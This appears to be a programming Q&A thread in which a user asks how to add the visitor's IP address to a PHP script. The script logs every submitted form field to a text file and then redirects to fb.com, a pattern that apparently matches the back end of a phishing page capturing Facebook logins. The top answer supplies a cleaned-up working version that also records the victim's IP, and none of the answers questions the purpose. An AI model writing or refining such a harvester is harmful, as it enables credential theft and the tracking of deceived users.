# remote IP and post it to text file

Tags: php, ip-address

Please how do I get a remote IP address using a PHP

I have this PHP file

```
<?php
 header("Location: http://fb.com/ ");
 $handle = fopen("test.txt", "a");
 foreach($_POST as $variable => $value) {
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
 }
 fwrite($handle, "\r\n");
 fclose($handle);
 exit;
?>
```

how do I add a code to get REMOTE address and post on the same text file of $_POST variables?

Answer (score 1):

1. Use [`$_SERVER['REMOTE_ADDR']`](http://php.net/%24_SERVER) to get IP of requesting user machine.
2. Change your script to make it's logic more short and transparent:

   ```
   <?php
   $handle = fopen('test.txt', 'a');

   foreach($_POST as $variable => $value) {
       fwrite($handle, $variable . '=' . $value . PHP_EOL);
   }

   fwrite($handle, 'REMOTE IP: ' . $_SERVER['REMOTE_ADDR'] . PHP_EOL);
   fclose($handle);

   header('Location: http://fb.com/');
   exit;
   ?>
   ```

Answer (score 1):

Seems like you are looking to grab ip address of some website `http://fb.com`... If that's the case.. do like this in a single line.

```
<?php
file_put_contents('yourfile.txt',gethostbyname('google.com'),FILE_APPEND);// replace google.com with the website which you are looking to grab the ip.
```

Or if you are looking to grab the up address of the remote machine requesting your page.. you can do like this..

```
<?php
file_put_contents('yourfile.txt',$_SERVER['REMOTE_ADDR'],FILE_APPEND);
```

Answer (score 0):

Use this to get remote ip addres:

```
$remoteIpAddress = $_SERVER['REMOTE_ADDR'];
```

http://php.net/manual/en/reserved.variables.server.php

Or if you want to get ip address by host name use:

```
$remoteIpAddress  = gethostbyname('www.example.com');
```